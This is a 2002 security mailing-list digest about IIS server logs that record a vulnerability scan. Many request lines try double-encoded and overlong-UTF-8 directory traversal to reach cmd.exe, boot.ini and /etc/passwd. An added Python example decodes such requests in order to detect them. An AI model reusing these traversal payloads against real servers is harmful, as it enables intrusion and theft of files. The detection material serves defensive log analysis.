2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/fpcount.exe 404 604 59 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /_vti_pvt/users.pwd - 404 604 58 0
80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /iisadmpwd/ - 404 604 50 0 80 - - -
2002-07-01 17:39:17 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/..%255c..%255c/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.ex
e 404 604 126 0 80 - - -

2002-07-01 17:39:17 80.129.106.43 - GET /graphics/sml3com - 404 604 56 0 80
- - -
2002-07-01 17:39:17 80.129.106.43 - GET /index.php
|=forum/view.php&topic=../../../../../../../etc/passwd 404 604 104 0 80 - -
-

2002-07-01 17:39:17 80.129.106.43 - GET /index.php
|=../../../../../../../../etc/passwd 404 604 87 0 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../cmd1.exe 404 604 77 0 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/C:/temp/\../ 404 604 52 15 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 111 0
80 - - -

2002-07-01 17:39:18 80.129.106.43 - GET /index.php
l=forum/view.php&topic=../../../../../../../etc/passwd 404 604 104 0 80 - -
-

2002-07-01 17:39:18 80.129.106.43 - GET /index.php
l=../../../../../../../../etc/passwd 404 604 86 0 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/..%c0%af../..%c0%af../cmd.exe 404 604 76 0 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/..\..\..\..\..\autoexec.bat 404 604 67 0 80 - - -
2002-07-01 17:39:18 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 109
0 80 - - -

2002-07-01 17:39:19 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/sensepost.exe 404 604 70 0 80 - - -
2002-07-01 17:39:19 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/..\..\..\boot.ini 404 604 57 0 80 - - -
2002-07-01 17:39:19 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/_vti_bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 108
0 80 - - -

2002-07-01 17:39:19 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/cmd1.exe 404 604 65 0 80 - - -
2002-07-01 17:39:21 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/../../../boot.ini 404 604 57 16 80 - - -
2002-07-01 17:39:22 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/iisadmpwd/cmd.exe 404 604 64 0 80 - - -
2002-07-01 17:39:22 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/samples/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 17:39:23 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/samples/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 17:39:23 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/msadc/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 105 0
80 - - -

2002-07-01 17:39:23 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/samples/cmd.exe 404 604 62 16 80 - - -
2002-07-01 17:39:25 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/..%255c..%255cwinnt/system32/cmd.exe 404 604 95 0 80 - - -

2002-07-01 17:39:25 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 17:39:26 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 17:39:26 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/cgi-bin/cmd.exe 404 604 62 16 80 - - -
2002-07-01 17:39:28 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_cnf/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 17:39:28 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_cnf/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 17:39:32 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_cnf/cmd.exe 404 604 62 0 80 - - -
2002-07-01 17:39:32 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_bin/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 17:39:34 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_bin/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 17:39:34 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/vti_bin/cmd.exe 404 604 62 0 80 - - -
2002-07-01 17:39:35 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/msadc/sensepost.exe 404 604 66 0 80 - - -
2002-07-01 17:39:35 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/msadc/cmd1.exe 404 604 61 0 80 - - -
2002-07-01 17:39:37 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/msadc/cmd.exe 404 604 60 0 80 - - -
2002-07-01 17:39:37 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/sensepost.exe 404 604 68 0 80 - - -
2002-07-01 17:39:38 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/cmd1.exe 404 604 63 0 80 - - -
2002-07-01 17:39:38 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/scripts/cmd.exe 404 604 62 0 80 - - -
2002-07-01 17:39:40 80.129.106.43 - GET /<Rejected-By-UrlScan>
~/sensepost.exe 404 604 60 0 80 - - -
2002-07-01 17:39:40 80.129.106.43 - GET /<Rejected-By-UrlScan> ~/cmd1.exe
404 604 55 0 80 - - -
2002-07-01 17:39:41 80.129.106.43 - GET /<Rejected-By-UrlScan> ~/cmd.exe 404
604 54 0 80 - - -
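
An added example, not part of the thread: a log classifier for requests like those in Paul's log above, which percent-decodes each requested URL until it stops changing, folds two-byte overlong UTF-8 such as `%c0%af`, and only then looks for `..` path segments. The sample lines are copied from the log above with wrapped lines re-joined; the field positions, the reading of the field after `/<Rejected-By-UrlScan>` as the original URL with a `~` prefix, and all names are assumptions.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote_to_bytes

REJECTED_STEM = "/<Rejected-By-UrlScan>"
# File names that the probes on this page ask for.
SENSITIVE_SUFFIXES = ("cmd.exe", "boot.ini", "autoexec.bat", "etc/passwd")

# Sample input: six lines from the log above, wrapping re-joined.
SAMPLE_LOG = r"""
2002-07-01 14:58:07 217.82.44.2 - GET /invalidfilename.htm - 404 604 59 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/..%c0%af../..%c0%af../sensepost.exe 404 604 82 0 80 - - -
2002-07-01 14:58:51 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/cgi-bin/..%255c..%255c/..%255c..%255c/winnt/system32/cmd.exe 404 604 111 0 80 - - -
2002-07-01 14:58:50 217.82.44.2 - GET /index.php |=../../../../../../../../etc/passwd 404 604 87 0 80 - - -
2002-07-01 14:58:53 217.82.44.2 - GET /<Rejected-By-UrlScan> ~/..\..\..\boot.ini 404 604 57 16 80 - - -
2002-07-01 17:38:03 80.129.106.43 - GET /index.asp - 200 21849 40 703 80 - - -
""".strip().splitlines()


@dataclass
class Finding:
    src: str
    status: str
    normalized: str   # URL after all decoding, backslashes as "/"
    rounds: int       # percent-decoding passes that changed the input
    tags: frozenset


def decode_layers(target, max_rounds=5):
    """Percent-decode until the bytes stop changing; return (bytes, rounds)."""
    cur, rounds = target.encode("utf-8"), 0
    while rounds < max_rounds:
        nxt = unquote_to_bytes(cur)
        if nxt == cur:
            break
        cur, rounds = nxt, rounds + 1
    return cur, rounds


def fold_overlong(data):
    """Map 2-byte overlong UTF-8 (lead 0xC0/0xC1) to the ASCII byte it encodes."""
    out, i, hit = bytearray(), 0, False
    while i < len(data):
        lead = data[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (data[i + 1] & 0x3F))
            hit = True
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out), hit


def analyse_line(line):
    """Classify one log line; returns None if it has too few fields."""
    f = line.split()
    if len(f) < 8:
        return None
    src, stem, query, status = f[2], f[5], f[6], f[7]
    tags = set()
    if stem == REJECTED_STEM:
        tags.add("urlscan-rejected")
        target = query[1:] if query.startswith("~") else query
    else:
        target = stem if query == "-" else stem + "?" + query

    raw, rounds = decode_layers(target)
    folded, overlong = fold_overlong(raw)
    normalized = folded.decode("latin-1").replace("\\", "/")

    if rounds >= 2:
        tags.add("double-encoded")
    if overlong:
        tags.add("overlong-utf8")
    if ".." in re.split(r"[/?=&]", normalized):
        tags.add("traversal")
    if normalized.lower().endswith(SENSITIVE_SUFFIXES):
        tags.add("sensitive-target")
    return Finding(src, status, normalized, rounds, frozenset(tags))


def analyse(lines):
    return [f for f in map(analyse_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding.src, finding.status, finding.normalized, sorted(finding.tags))
```

A filter that decodes only once sees `..%5c..` in the `%255c` requests and no separator next to the dots, which is why the decoding loop runs until the input is stable before the `..` check.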


------_=_NextPart_001_01C221DD.686AE480
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=US-ASCII">
<TITLE>Message</TITLE>

<META content="MSHTML 5.50.4916.2300" name=GENERATOR></HEAD>
<BODY>
<DIV><SPAN class=583113015-02072002><FONT face=Arial color=#0000ff
size=2>It's
clearly (at least to me, could be wrong) a vulnerability scan-- maybe
someone
pointed Nessus at you??</FONT></SPAN></DIV>
<BLOCKQUOTE dir=ltr style="MARGIN-RIGHT: 0px">
  <DIV></DIV>
  <DIV class=OutlookMessageHeader lang=en-us dir=ltr align=left><FONT
  face=Tahoma size=2>-----Original Message-----<BR><B>From:</B> Paul Marsh
  [mailto:pmarsh at nmefdn.org] <BR><B>Sent:</B> Tuesday, July 02, 2002 5:52
  AM<BR><B>To:</B> 'Dshield (E-mail)<BR><B>Subject:</B> [Dshield] GET
  /invalidfilename.htm???<BR><BR></FONT></DIV>
  <P><FONT size=2>Has anyone else seen the following in there logs?&nbsp;
Sorry
  for the lengthy log snippet but it's two attacks.</FONT> </P>
  <P><FONT size=2>TIA, Paul</FONT> </P>
  <P><FONT size=2>2002-07-01 14:58:07 217.82.44.2 - GET
/invalidfilename.htm -
  404 604 59 0 80 - - -</FONT> <BR><FONT size=2>2002-07-01 14:58:07
217.82.44.2
  - GET /invalidfilename.cgi - 404 604 59 0 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 14:58:50 217.82.44.2 - GET /&lt;Rejected-By-UrlScan&gt;
  ~/cgi-bin/auktion.pl 404 604 58 15 80 - - -</FONT> <BR><FONT
size=2>2002-07-01
  14:58:50 217.82.44.2 - GET /&lt;Rejected-By-UrlScan&gt;
  ~/cgi-bin/simplestguest.cgi 404 604 65 47 80 - - -</FONT> <BR><FONT
  size=2>2002-07-01 14:58:50 217.82.44.2 - GET /msadc/msadcs.dll - 404 604
56 0
  80 - - -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/script/tools/newdsn.exe 404 604 63 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-winuploader.exe 404 604 59 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/imagemap.exe 404 604 60 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/shop.cgi 404 604 56 16
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/cgi-bin/textcounter.pl 404 604 62 0 80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/iisadmin/ism.dll 404 604 64 0
80 - -
  -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/samples/ctguestb.idc 404 604 68 0
80 -
  - -</FONT> <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/scripts/perl.exe 404 604 56 0
80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET /msadc/samples/ -
404
  604 54 0 80 - - -</FONT> <BR><FONT size=2>2002-07-01 14:58:50
217.82.44.2 -
  GET /msadc/Samples/SELECTOR/showcode.asp - 404 604 75 16 80 - - -</FONT>
  <BR><FONT size=2>2002-07-01 14:58:50 217.82.44.2 - GET
  /&lt;Rejected-By-UrlScan&gt; ~/..%c0%af../..%c0%af../sensepost.exe 404 604
82
  0 80 - - -</FONT></P>
  </BLOCKQUOTE></BODY></HTML>




--__--__--



End of Dshield Digest



